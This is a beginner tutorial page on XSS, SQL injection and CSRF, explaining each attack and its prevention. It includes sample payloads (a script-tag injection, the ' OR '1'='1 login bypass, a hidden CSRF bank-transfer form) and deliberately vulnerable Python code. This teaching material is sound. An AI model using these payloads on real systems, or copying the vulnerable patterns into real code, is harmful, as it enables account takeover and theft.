Common Threats (XSS, SQLi, CSRF) | Cyber Security Tutorial - Learn with VOKS
Advance AI Bootstrap C C++ Computer Vision Content Writing CSS Cyber Security Data Analysis Deep Learning Email Marketing Excel Figma HTML Java Script Machine Learning MySQLi Node JS PHP Power Bi Python Python for AI Python for Analysis React React Native SEO SMM SQL
Back Next
Cyber Security
01. Introduction 02. Types of Cyber Threats 03. Cyber Security Domains 04. CIA Triad (Confidentiality Integrity Availability) 05. Career paths in Cyber Security 06. Certifications 07. Ethics and Responsible Disclosure 08. Laws and Regulation (e.g. GDPR, NDPR) 09. What is an OS? 10. Types: Window, Linus, macOS 11. Command-line vs GUI 12. OS Internals Overview (filesystems, processes, permissions) 13. Windows command prompt basics 14. Linux Bash Basics 15. File System Navigation 16. Basic Scripting 17. IP Addressing 18. DNS, DHCP 19. Mac Address 20. OSI VS TCP/IP Models 21. Ports and Protocols (TCP, UDP) 22. Common Protocols (HTTPS, FTP, SSH, etc.) 23. Packet structure 24. Firewalls, IDS/IPS, VPNs 25. Common attacks: MITM, Sniffing 26. Secure Network Practices 27. How the Web works 28. HTTP vs HTTPS 29. URLs, Headers, Cookies 30. Client-Server Architecture 31. Introduction To Web Security 32. OWASP Top 10 Overview 33. Common Threats (XSS, SQLi, CSRF) 34. Inpute validation and authentication flow 35. Basic Exploitation demo (e.g. XSS) 36. Burp Suite Introduction 37. Using a Browser For Testing 38. Password security 39. MFA-Antivirus 40. Cyber Hygeine Practice 41. Intro To Tools: Nmap, Wireshark, Netstat

Common Threats (XSS, SQLi, CSRF)

Common Threats (XSS, SQLi, CSRF)

Web applications face many security threats, but three of the most common and dangerous are:

  • Cross-Site Scripting (XSS)
  • SQL Injection (SQLi)
  • Cross-Site Request Forgery (CSRF)

This explanation is written for beginners and will clearly explain what each attack is, how it works, and how to prevent it.

Cross-Site Scripting (XSS)

What Is XSS

Cross-Site Scripting (XSS) is a vulnerability that allows attackers to inject malicious scripts (usually JavaScript) into web pages viewed by other users.

The attack happens when a website displays user input without properly validating or escaping it.

How XSS Works

Imagine a comment section on a website.

A user submits this comment:


<script>alert("Hacked");</script>

If the website displays this comment without filtering it, the browser will execute the script.

Instead of just showing text, it runs the attacker’s JavaScript code.

Types Of XSS

Stored XSS

Malicious script is stored in the database and shown to every visitor.

Reflected XSS

Malicious script is reflected in the response immediately.

DOM-Based XSS

Vulnerability exists in client-side JavaScript.

Example Of Vulnerable Code (XSS)

Unsafe example:


user_input = input("Enter comment: ")
print("<html><body>")
print(user_input)
print("</body></html>")

If the user enters a script tag, it will be executed in the browser.

How To Prevent XSS

  • Escape user input before displaying it.
  • Use secure frameworks that auto-escape output.
  • Implement Content Security Policy (CSP).
  • Validate and sanitize all input.

Safer example:


import html

user_input = input("Enter comment: ")
safe_output = html.escape(user_input)

print("<html><body>")
print(safe_output)
print("</body></html>")

The html.escape() function converts special characters into safe text.

SQL Injection (SQLi)

What Is SQL Injection

SQL Injection occurs when an attacker inserts malicious SQL code into input fields to manipulate database queries.

It happens when applications directly insert user input into SQL statements.

How SQL Injection Works

Imagine a login system that builds a query like this:


username = input("Enter username: ")
password = input("Enter password: ")

query = "SELECT * FROM users WHERE username = '" + username + "' AND password = '" + password + "'"
print(query)

If the attacker enters:

Username:

' OR '1'='1

The query becomes:

SELECT * FROM users WHERE username = '' OR '1'='1' AND password = ''

Since '1'='1' is always true, the attacker may bypass authentication.

How To Prevent SQL Injection

  • Use parameterized queries.
  • Use prepared statements.
  • Validate input.
  • Avoid dynamic query building.

Safer example:


username = input("Enter username: ")
password = input("Enter password: ")

query = "SELECT * FROM users WHERE username = ? AND password = ?"
print("Using parameterized query:", query)

Parameterized queries prevent user input from being treated as executable SQL code.

Cross-Site Request Forgery (CSRF)

What Is CSRF

Cross-Site Request Forgery tricks a logged-in user into performing actions they did not intend.

The attacker does not steal the password.

Instead, they use the victim’s active session to perform actions.

How CSRF Works

  1. User logs into a banking website.
  2. User remains logged in.
  3. User visits a malicious website.
  4. That malicious site sends a hidden request to the banking site.
  5. Because the user is already authenticated, the request is accepted.

Example of malicious HTML:


<form action="https://bank.com/transfer" method="POST">
  <input type="hidden" name="amount" value="1000">
  <input type="hidden" name="to_account" value="attacker_account">
  <input type="submit" value="Click Here">
</form>

If the victim clicks it, the transfer may occur.

How To Prevent CSRF

  • Use CSRF tokens.
  • Require re-authentication for sensitive actions.
  • Use SameSite cookies.
  • Validate request origin.

Example of CSRF token validation (conceptual):


session_token = "abc123"
form_token = input("Enter CSRF token: ")

if form_token == session_token:
    print("Request allowed")
else:
    print("Invalid CSRF token")

The token ensures that the request comes from the legitimate website.

Comparison Of XSS, SQLi, And CSRF

XSS

Injects malicious scripts into web pages.

SQL Injection

Injects malicious SQL into database queries.

CSRF

Tricks users into performing unwanted actions.

Why These Threats Are Dangerous

They can lead to:

  • Account takeover
  • Data theft
  • Financial loss
  • Website defacement
  • Loss of trust

These attacks are among the most common web vulnerabilities.

Example Code:
# Vulnerable XSS Example
user_input = input("Enter comment: ")
print("<html><body>")
print(user_input)
print("</body></html>")

# Safe XSS Prevention
import html
user_input = input("Enter comment: ")
safe_output = html.escape(user_input)
print("<html><body>")
print(safe_output)
print("</body></html>")

# Vulnerable SQL Injection Example
username = input("Enter username: ")
password = input("Enter password: ")
query = "SELECT * FROM users WHERE username = '" + username + "' AND password = '" + password + "'"
print(query)

# Safe Parameterized Query Example
username = input("Enter username: ")
password = input("Enter password: ")
query = "SELECT * FROM users WHERE username = ? AND password = ?"
print("Using parameterized query:", query)

# CSRF Token Validation Example
session_token = "abc123"
form_token = input("Enter CSRF token: ")
if form_token == session_token:
    print("Request allowed")
else:
    print("Invalid CSRF token")
Cyber Security
Introduction Types of Cyber Threats Cyber Security Domains CIA Triad (Confidentiality Integrity Availability) Career paths in Cyber Security Certifications Ethics and Responsible Disclosure Laws and Regulation (e.g. GDPR, NDPR) What is an OS? Types: Window, Linus, macOS Command-line vs GUI OS Internals Overview (filesystems, processes, permissions) Windows command prompt basics Linux Bash Basics File System Navigation Basic Scripting IP Addressing DNS, DHCP Mac Address OSI VS TCP/IP Models Ports and Protocols (TCP, UDP) Common Protocols (HTTPS, FTP, SSH, etc.) Packet structure Firewalls, IDS/IPS, VPNs Common attacks: MITM, Sniffing Secure Network Practices How the Web works HTTP vs HTTPS URLs, Headers, Cookies Client-Server Architecture Introduction To Web Security OWASP Top 10 Overview Common Threats (XSS, SQLi, CSRF) Inpute validation and authentication flow Basic Exploitation demo (e.g. XSS) Burp Suite Introduction Using a Browser For Testing Password security MFA-Antivirus Cyber Hygeine Practice Intro To Tools: Nmap, Wireshark, Netstat
All Courses
Advance AI Bootstrap C C++ Computer Vision Content Writing CSS Cyber Security Data Analysis Deep Learning Email Marketing Excel Figma HTML Java Script Machine Learning MySQLi Node JS PHP Power Bi Python Python for AI Python for Analysis React React Native SEO SMM SQL